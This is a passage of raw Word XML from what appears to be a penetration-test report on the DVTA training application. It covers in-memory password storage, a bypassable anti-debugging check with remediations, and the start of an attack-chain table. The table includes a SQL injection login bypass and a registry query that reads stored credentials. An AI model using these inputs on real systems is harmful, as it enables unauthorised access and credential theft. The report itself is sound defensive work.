      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001D5">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>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 29: assigned the decrypted SA password — never zeroed</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001D6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>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DBAccessClass.cs Line 30: Console.WriteLine confirms it is a plain string (System.String)</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001D7">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D8">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D9">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decrypted database password is stored in a private instance field of type System.String. .NET strings are immutable and garbage-collected non-deterministically. The password persists in the process heap from the moment of decryption until the object is collected — which may never occur during the application lifetime. No SecureString or explicit memory zeroing is implemented.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table34"/>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1DA">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DBAccessClass.cs  Line 29,182</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001DB">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this.decryptedDBPassword = Encoding.ASCII.GetString(bytes);  // assigned</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001DC">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Field declaration:</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001DD">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private string decryptedDBPassword;  // never zeroed, never pinned</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001DE">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System.String is immutable — no clear() method available</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001DF">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GC timing is non-deterministic — may persist for process lifetime</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001E0">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5"/>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1E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A local process with PROCESS_VM_READ access (local admin or exploited process) can dump the DVTA process memory and extract the SA database password using strings analysis on the dump. The password is printed to stdout (Finding 7), making memory recovery an alternative to console capture rather than the primary attack vector.</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001E2">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0f3460"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>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1E3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>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Replace System.String with System.Security.SecureString for all credential storage</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001E4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>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Explicitly zero credential buffers using Marshal.ZeroFreeGlobalAllocAnsi after use</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001E5">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>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Minimize credential lifetime: retrieve at exact point of use, release immediately</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001E6">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E7">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1E8">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6"/>
        <w:tblW w:w="9026.0" w:type="dxa"/>
        <w:jc w:val="left"/>
        <w:tblInd w:w="-180.0" w:type="dxa"/>
        <w:tblLayout w:type="fixed"/>
        <w:tblLook w:val="0000"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="4513"/>
        <w:gridCol w:w="4513"/>
        <w:tblGridChange w:id="0">
          <w:tblGrid>
            <w:gridCol w:w="4513"/>
            <w:gridCol w:w="4513"/>
          </w:tblGrid>
        </w:tblGridChange>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="0"/>
          <w:trHeight w:val="1" w:hRule="atLeast"/>
          <w:tblHeader w:val="0"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:gridSpan w:val="2"/>
            <w:tcBorders>
              <w:top w:color="d5d8dc" w:space="0" w:sz="4" w:val="single"/>
              <w:left w:color="d5d8dc" w:space="0" w:sz="4" w:val="single"/>
              <w:bottom w:color="d5d8dc" w:space="0" w:sz="4" w:val="single"/>
              <w:right w:color="d5d8dc" w:space="0" w:sz="4" w:val="single"/>
            </w:tcBorders>
            <w:shd w:fill="0f3460" w:val="clear"/>
            <w:tcMar>
              <w:left w:w="180.0" w:type="dxa"/>
              <w:right w:w="180.0" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="top"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001E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6"/>
                <w:szCs w:val="26"/>
                <w:shd w:fill="auto" w:val="clear"/>
                <w:vertAlign w:val="baseline"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Finding 12  —  Anti-Debugging Evasion</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2f4f7" w:val="clear"/>
            <w:tcMar>
              <w:left w:w="120.0" w:type="dxa"/>
              <w:right w:w="120.0" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="top"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001EB">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CWE: </w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1a1a2e"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:shd w:fill="auto" w:val="clear"/>
                <w:vertAlign w:val="baseline"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">N/A — Anti-Analysis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20.0" w:type="dxa"/>
              <w:right w:w="120.0" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="top"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001EC">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20"/>
                <w:szCs w:val="20"/>
                <w:shd w:fill="auto" w:val="clear"/>
                <w:vertAlign w:val="baseline"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">CVSS —  —  Info</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001ED">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EE">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c0392b"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:fill="auto" w:val="clear"/>
          <w:vertAlign w:val="baseline"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Evidence</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001EF">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>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Login.cs Lines 17–28: IsBeingDebugged() returns Debugger.IsAttached</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001F0">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:spacing w:after="36" w:before="36" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="720" w:right="0" w:hanging="36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Login() constructor: if(IsBeingDebugged()) Environment.Exit(1)</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001F1">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F2">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8" name=""/>
                <a:graphic>
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr/>
                      <wps:cNvPr id="9" name="Shape 9"/>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1F3">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9 — Login.cs: anti-debugging check in constructor</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001F4">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F5">
      <w:pPr>
        <w:spacing w:after="50" w:before="140" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="16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b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="16213e"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:fill="auto" w:val="clear"/>
          <w:vertAlign w:val="baseline"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Root Cause</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001F6">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Login form constructor calls Debugger.IsAttached. If a managed debugger is detected, the application terminates immediately via Environment.Exit(1). This is a standard anti-analysis technique that hinders dynamic analysis with managed debuggers (e.g., Visual Studio, dnSpy debug mode).</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table37"/>
        <w:tblW w:w="9026.0" w:type="dxa"/>
        <w:jc w:val="left"/>
        <w:tblInd w:w="-140.0" w:type="dxa"/>
        <w:tblLayout w:type="fixed"/>
        <w:tblLook w:val="0000"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9026"/>
        <w:tblGridChange w:id="0">
          <w:tblGrid>
            <w:gridCol w:w="9026"/>
          </w:tblGrid>
        </w:tblGridChange>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="0"/>
          <w:trHeight w:val="1" w:hRule="atLeast"/>
          <w:tblHeader w:val="0"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcBorders>
              <w:top w:color="334155" w:space="0" w:sz="4" w:val="single"/>
              <w:left w:color="836967" w:space="0" w:sz="12" w:val="single"/>
              <w:bottom w:color="334155" w:space="0" w:sz="4" w:val="single"/>
              <w:right w:color="334155" w:space="0" w:sz="4" w:val="single"/>
            </w:tcBorders>
            <w:shd w:fill="1e2835" w:val="clear"/>
            <w:tcMar>
              <w:left w:w="140.0" w:type="dxa"/>
              <w:right w:w="140.0" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="top"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001F7">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Login.cs  Line 22–29</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001F8">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public Login()</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001F9">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w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001FA">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this.InitializeComponent();</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001FB">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bool flag = this.IsBeingDebugged();  // Debugger.IsAttached</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001FC">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if (flag)</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001FD">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w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001FE">
            <w:pPr>
              <w:spacing w:after="4" w:before="4"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Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="ff6b6b"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
                <w:shd w:fill="auto" w:val="clear"/>
                <w:vertAlign w:val="baseline"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">        Environment.Exit(1);  // terminates under managed debugger</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001FF">
            <w:pPr>
              <w:spacing w:after="4" w:before="4" w:line="240" w:lineRule="auto"/>
              <w:ind w:left="0" w:right="0" w:firstLine="0"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:shd w:fill="auto" w:val="clear"/>
                <w:vertAlign w:val="baseline"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="e2e8f0"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>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200">
      <w:pPr>
        <w:spacing w:after="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8"/>
        <w:tblW w:w="9026.0" w:type="dxa"/>
        <w:jc w:val="left"/>
        <w:tblInd w:w="-150.0" w:type="dxa"/>
        <w:tblLayout w:type="fixed"/>
        <w:tblLook w:val="0000"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9026"/>
        <w:tblGridChange w:id="0">
          <w:tblGrid>
            <w:gridCol w:w="9026"/>
          </w:tblGrid>
        </w:tblGridChange>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="0"/>
          <w:trHeight w:val="1" w:hRule="atLeast"/>
          <w:tblHeader w:val="0"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcBorders>
              <w:top w:color="c0392b" w:space="0" w:sz="4" w:val="single"/>
              <w:left w:color="c0392b" w:space="0" w:sz="16" w:val="single"/>
              <w:bottom w:color="c0392b" w:space="0" w:sz="4" w:val="single"/>
              <w:right w:color="c0392b" w:space="0" w:sz="4" w:val="single"/>
            </w:tcBorders>
            <w:shd w:fill="fef2f2" w:val="clear"/>
            <w:tcMar>
              <w:left w:w="150.0" w:type="dxa"/>
              <w:right w:w="150.0" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="top"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000020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c0392b"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
                <w:shd w:fill="auto" w:val="clear"/>
                <w:vertAlign w:val="baseline"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Observation:  </w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1a1a2e"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
                <w:shd w:fill="auto" w:val="clear"/>
                <w:vertAlign w:val="baseline"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">The check is only effective against managed .NET debuggers (Debugger.IsAttached). It does not detect unmanaged debuggers (x64dbg, WinDbg) or memory analysis tools (ProcDump, Volatility). Patching the binary with dnSpy (setting the bool to false) trivially bypasses it. The control is noted as informational only.</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000202">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03">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204">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05">
      <w:pPr>
        <w:spacing w:after="160" w:before="440" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="16213e"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:shd w:fill="auto" w:val="clear"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="16213e"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:shd w:fill="auto" w:val="clear"/>
          <w:vertAlign w:val="baseline"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">4. Attack Chain — Source-Confirmed Kill Path</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000206">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Every step below corresponds to a confirmed source-code finding. No step is inferred.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000207">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08">
      <w:pPr>
        <w:spacing w:after="80" w:before="1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mc:AlternateContent>
          <mc:Choice Requires="wpg">
            <w:drawing>
              <wp:inline distB="0" distT="0" distL="114300" distR="114300">
                <wp:extent cx="4136390" cy="2334895"/>
                <wp:effectExtent b="0" l="0" r="0" t="0"/>
                <wp:docPr id="6" name=""/>
                <a:graphic>
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr/>
                      <wps:cNvPr id="7" name="Shape 7"/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="3284155" y="2618903"/>
                          <a:ext cx="4123690" cy="232219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4136390" cy="2334895"/>
                <wp:effectExtent b="0" l="0" r="0" t="0"/>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4136390" cy="2334895"/>
                        </a:xfrm>
                        <a:prstGeom prst="rect"/>
                        <a:ln/>
                      </pic:spPr>
                    </pic:pic>
                  </a:graphicData>
                </a:graphic>
              </wp:inline>
            </w:drawing>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000209">
      <w:pPr>
        <w:spacing w:after="160" w:before="20" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:fill="auto" w:val="clear"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:color w:val="7f8c8d"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:fill="auto" w:val="clear"/>
          <w:vertAlign w:val="baseline"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure 12 — Full attack chain: SQLi to FTP pivot and data destruction</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000020A">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39"/>
        <w:tblW w:w="9026.0" w:type="dxa"/>
        <w:jc w:val="left"/>
        <w:tblInd w:w="-100.0" w:type="dxa"/>
        <w:tblLayout w:type="fixed"/>
        <w:tblLook w:val="0000"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="500"/>
        <w:gridCol w:w="1600"/>
        <w:gridCol w:w="3100"/>
        <w:gridCol w:w="1800"/>
        <w:gridCol w:w="2026"/>
        <w:tblGridChange w:id="0">
          <w:tblGrid>
            <w:gridCol w:w="500"/>
            <w:gridCol w:w="1600"/>
            <w:gridCol w:w="3100"/>
            <w:gridCol w:w="1800"/>
            <w:gridCol w:w="2026"/>
          </w:tblGrid>
        </w:tblGridChange>
      </w:tblGrid>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0B">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0C">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Phase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0D">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Action</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0E">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Source Ref</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0F">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Finding</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0">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1</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1">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Initial Access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2">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SQLi: ' OR '1'='1' -- in login form</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3">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Login.cs:54 / DBAccess:65</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4">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F1</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15">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2</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16">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Cred Harvest</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17">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SELECT users </w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Cambria Math" w:cs="Cambria Math" w:eastAsia="Cambria Math" w:hAnsi="Cambria Math"/>
                <w:color w:val="1a1a2e"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
                <w:shd w:fill="auto" w:val="clear"/>
                <w:vertAlign w:val="baseline"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">→</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1a1a2e"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
                <w:shd w:fill="auto" w:val="clear"/>
                <w:vertAlign w:val="baseline"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve"> all plaintext passwords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18">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DBAccessClass.cs:65-70</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19">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F1+F2</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A">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3</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B">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Registry Dump</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C">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reg query HKCU\dvta </w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Cambria Math" w:cs="Cambria Math" w:eastAsia="Cambria Math" w:hAnsi="Cambria Math"/>
                <w:color w:val="1a1a2e"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
                <w:shd w:fill="auto" w:val="clear"/>
                <w:vertAlign w:val="baseline"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">→</w:t>
            </w:r>
